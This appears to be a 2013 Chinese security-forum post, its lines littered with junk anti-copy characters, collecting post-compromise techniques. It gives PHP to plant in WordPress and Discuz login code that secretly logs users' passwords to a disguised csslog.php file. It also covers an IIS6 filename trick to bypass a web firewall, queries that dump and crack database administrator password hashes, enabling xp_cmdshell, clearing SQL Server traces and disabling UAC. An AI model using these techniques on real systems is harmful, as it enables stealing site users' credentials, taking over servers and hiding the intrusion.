5 `8 v. f3 ~, N* E" I& d' O; ]当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。
) w6 Q1 U3 r O% h! S: y8 R4 h; _% o" l就是搜索case ‘login’- ?) v; p$ y) A2 } j) ?6 X$ l
在它下面直接插入即可,记录的密码生成在pwd.txt中,7 o! v( D# z- i
其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录. v& Q r$ p9 D. ^( J @1 [
利用II6文件解析漏洞绕过安全狗代码:
3 i: ?$ k+ F) E, v9 E6 E+ d. {2 x2 v8 e;antian365.asp;antian365.jpg
: c/ w4 {, M& m8 ~1 d! h4 t" `' ^- T% k4 P$ N9 z
各种类型数据库抓HASH破解最高权限密码!* R, ^# {2 M- g. x6 S/ ~; O, A9 z
1.sql server2000
. U, h' s: a/ R( U# |3 fSELECT password from master.dbo.sysxlogins where name='sa'& N c6 n F% p, y( R) }2 i
0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341
1 s* q, Z- E* ^% n* S5 l+ a2FD54D6119FFF04129A1D72E7C3194F7284A7F3A" }% q, @( B4 }7 o! `1 E
. k) c6 O: H, t3 @$ p, S0×0100- constant header: f" ^, }0 |8 k7 s% i8 \
34767D5C- salt+ I% f. d9 v! M* @5 t+ Z
0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash# ]9 h5 s1 Z0 ~# K$ y
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash
/ V7 m4 V7 A- K$ p1 Fcrack the upper case hash in ‘cain and abel’ and then work the case sentive hash7 q9 `- i6 b, h% d% Y9 e/ U
SQL server 2005:-
0 V8 X9 } N" z8 D+ u( WSELECT password_hash FROM sys.sql_logins where name='sa'
8 _5 a7 \$ V# U9 ~0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F; c5 b: p# A) A8 w: e" ]
0×0100- constant header
$ B4 s$ ]( q9 s4 ]( p" E" Y; t+ M" F993BF231-salt- {6 F7 ]4 F) l" Q/ z1 H1 d3 V
5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash: P7 `5 b, D# _& c* k- L2 Y2 O1 y
crack case sensitive hash in cain, try brute force and dictionary based attacks." U" ?+ C) X! K3 }
# m6 N; t, E2 K( |. b5 Yupdate:- following bernardo’s comments:-) M9 b w7 r7 @; H |2 p4 o
use function fn_varbintohexstr() to cast password in a hex string.
8 w% N' l* N0 n* H3 ?e.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins+ C' x3 j: S+ ?. C
, g e( ] b; I, J7 U( y' }# RMYSQL:-
( G* O3 I- R' `1 Q4 K
4 x0 p' y' x: O, t) vIn MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.. m! \! [# _ |" }' Q
6 u9 y' n* E. A: ?*mysql < 4.1
\# V! o% ]$ B# C% @1 X, Z( z D: n
mysql> SELECT PASSWORD(‘mypass’);6 G6 s: v3 j6 [# s! |
+——————–+
) c; J# b+ D G- {| PASSWORD(‘mypass’) |1 l. o+ h' t& T1 s
+——————–+
* j' |! Z+ D0 [- E3 E| 6f8c114b58f2ce9e |
) e" x: O4 S' u) K1 k' f, t6 c+——————–+
& N% k5 F/ q" V
5 j2 j( W" B. b+ @. j% L% u( Y*mysql >=4.19 R3 N; M( Z" X% B' F7 o) s
: s. k7 P$ ?! m; Y; w# O7 jmysql> SELECT PASSWORD(‘mypass’);
: C* c- E% B+ X+——————————————-+* o2 d# _* M. W. [: i+ m
| PASSWORD(‘mypass’) |
4 J$ F% V" i( u$ M a+——————————————-+1 l+ A8 M" r8 ? S
| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |
. P1 z; u" b5 A2 h5 u+——————————————-+
, S- A3 u0 h# ?9 V5 {! ~. t- s& G
q4 m: b2 b3 _6 Y& L5 z1 ~$ F. @Select user, password from mysql.user
6 B3 ?5 H- }$ z& |9 UThe hashes can be cracked in ‘cain and abel’
, @1 [" L7 K" @) v5 I! \/ S6 M- O4 F) l, W7 ^$ x
Postgres:-( Z# @- q. x/ B9 _ J- U; y9 a
Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)8 _# {* Z4 U( @; j
select usename, passwd from pg_shadow;
# N: w8 [# p+ [# uusename | passwd
+ d( A3 A0 {; x" z. |6 k3 a——————+————————————- O( U6 [% s: [8 q( i5 f4 K2 f( s
testuser | md5fabb6d7172aadfda4753bf0507ed43967 ^5 o# F7 @! x2 x; ]
use mdcrack to crack these hashes:-' f# L2 G+ O2 f d: j
$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396+ B, R: u% ]8 b F. P; f7 L& ~9 G7 d) L
4 O! ~7 B3 M P3 |% g: `0 V6 d+ AOracle:-2 V1 X) B% ^( E$ ?/ u
select name, password, spare4 from sys.user$6 B$ _# H. z2 v5 A
hashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g
# m- v$ X1 x+ p2 C5 A+ m/ h$ ~- a+ uMore on Oracle later, i am a bit bored….3 ]0 e5 s3 g; d3 ?" d
A9 P6 Z8 d2 B$ [, q
% f6 f; V; Y, c9 l7 w% M
在sql server2005/2008中开启xp_cmdshell
* [( `9 [1 Z5 t+ O8 F. y4 x0 p-- To allow advanced options to be changed.
4 R9 i1 \9 Q% q. |3 BEXEC sp_configure 'show advanced options', 1* f- y3 B. w0 N
GO
6 l0 ^9 f& f2 U ?& S-- To update the currently configured value for advanced options.# B# k6 o @+ T2 n% [3 e) s' b6 y
RECONFIGURE
+ x( ^# p" E0 dGO+ z$ d. P) r; p' Q* I' D) r# q
-- To enable the feature.
- F" i4 F" P. T0 g( iEXEC sp_configure 'xp_cmdshell', 1% ?2 y6 D( r. r8 T
GO5 I5 R) @2 M/ `( u: d8 J1 S4 l
-- To update the currently configured value for this feature.
* n; B* t: G. J3 n/ fRECONFIGURE/ ]- T3 M* M2 a8 R" R
GO
9 K5 u7 ]; Z) {! c9 @6 Z' Z0 ]SQL 2008 server日志清除,在清楚前一定要备份。' A- U1 X) ^. m# v3 c8 |7 I
如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:- ?. A5 m1 C) I' d$ ?" A
X:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin$ ~& [+ Y9 z( t8 a
: z! _1 S/ v$ @# ~3 @9 x3 c- p. N对于SQL Server 2008以前的版本:
8 l) } x B6 M' s c, p9 j GSQL Server 2005:
# ~, j) r' z. j$ C$ q) V8 j删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat/ m7 N5 Y( c& @$ c' `
SQL Server 2000:
& M$ g) O0 i3 R清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\相应的内容即可。
& j& V1 S! B8 S( u( Y) w+ K9 W1 A3 F7 y0 `) g
本帖最后由 simeon 于 2013-1-3 09:51 编辑$ ^( e; \& y# I4 |# l. o9 U5 x, Z
7 f5 ~) k) o$ s( z$ r4 r
2 y5 M8 s' O, N: c- g9 fwindows 2008 文件权限修改3 o$ j" W. J5 ?$ p
1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx
9 n, s% }+ B$ p Y. ?2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad984 r4 K( D) L' F$ o
一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,
- L2 O3 ?: F Z8 P
3 o% Y4 G5 ?7 o# \Windows Registry Editor Version 5.007 Z8 m7 y: r& @4 W0 z
[HKEY_CLASSES_ROOT\*\shell\runas]
& E( y3 G4 B; z4 L@="管理员取得所有权"
4 r4 Y& i B- V9 b* M"NoWorkingDirectory"=""+ |: U i) n3 t4 Z
[HKEY_CLASSES_ROOT\*\shell\runas\command]
; b U- E3 G1 ^% p0 m: T@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"# {8 m) l/ k9 L# u% _ t
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"8 ^! K5 t6 a" x
[HKEY_CLASSES_ROOT\exefile\shell\runas2]
# k. Y; C1 }; f: t6 t) d, Z@="管理员取得所有权"* w4 m& O; E7 [4 P* D( |
"NoWorkingDirectory"=""
/ r2 l# Z/ E5 j; b" d: v8 F[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]: c, X5 X+ C4 i' O, x3 f& T
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
9 p2 u" \& |0 n9 F% w2 v"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
' ]" P4 g7 @, Z4 r8 S3 p6 U$ p# r- {1 F& X% Q1 N
[HKEY_CLASSES_ROOT\Directory\shell\runas], I4 H$ n* e# [5 ]9 [9 r! j3 Y
@="管理员取得所有权"
9 G, C* z4 P0 C. m* q+ {"NoWorkingDirectory"="": g, t: l3 |7 ^; t+ j
[HKEY_CLASSES_ROOT\Directory\shell\runas\command]
- b$ l) l1 W8 e* G3 ^/ R6 P- ~. Y@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
) j/ s$ X: Y) S' c- M( K! f1 z"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
# v; i6 T( D2 @) v
/ w9 M$ i# o9 y: C X# Q, a- d5 W, e n# B5 \
win7右键“管理员取得所有权”.reg导入
u/ a# K. x9 X+ L, j二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,
4 Z- e* w8 `3 A* |8 f" j {9 W5 K1、C:\Windows这个路径的“notepad.exe”不需要替换
$ o% g+ H" |9 t% m: G2、C:\Windows\System32这个路径的“notepad.exe”不需要替换, P4 @2 O0 u* V; b/ D
3、四个“notepad.exe.mui”不要管
- f. S0 W8 ?$ N6 t$ F4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和/ _, b$ X( I U' y& y$ ~
C:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”
+ M& ^: R! R+ P5 e5 g, b: n& q* C替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,& G1 L7 F' Q" G- t- j
替换完之后回到桌面,新建一个txt文档打开看看是不是变了。
3 C7 D7 s6 u2 E' v6 B+ s/ N7 h( Twindows 2008中关闭安全策略:
) t8 |- E. Y5 K$ X; E hreg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f- a" V9 ^6 W7 w, c/ E4 U+ {
修改uc_client目录下的client.php 在
: x0 |6 ~/ F+ M G9 U; k% |, ]function uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {, G- s* y7 d1 N; G
下加入如上代码,在网站./data/cache/目录下自动生成csslog.php. G) V! G9 p. _7 m9 e# W
你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw
. V8 Y3 I% c% \" {: _if(getenv('HTTP_CLIENT_IP')) {& e) |# l+ N% y- A; F6 x
$onlineip = getenv('HTTP_CLIENT_IP'); n) c# c W5 m; o$ C" W
} elseif(getenv('HTTP_X_FORWARDED_FOR')) {( c- d+ V6 \; _: W! J; U, p/ Y
$onlineip = getenv('HTTP_X_FORWARDED_FOR');
/ q; X4 N. W! _4 F4 j% H9 H} elseif(getenv('REMOTE_ADDR')) {4 h! r3 s( {) M; } U6 ?& E
$onlineip = getenv('REMOTE_ADDR');2 o; \. D2 p+ t) S
} else {% L) [# a5 `5 C% K$ c
$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];; e# s7 [2 p4 Q) C* i
}6 `* ?$ } v) ] H0 ~6 y
$showtime=date("Y-m-d H:i:s");0 b& H" n7 z1 V* m' ^( s7 _
$record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";3 q; S3 \) d- s2 ~" Y) f
$handle=fopen('./data/cache/csslog.php','a+');
\9 p, b& R3 g& J$ l: y! J* ? $write=fwrite($handle,$record); |
发表于 2013-2-27 21:24:42
收藏
分享
支持
反对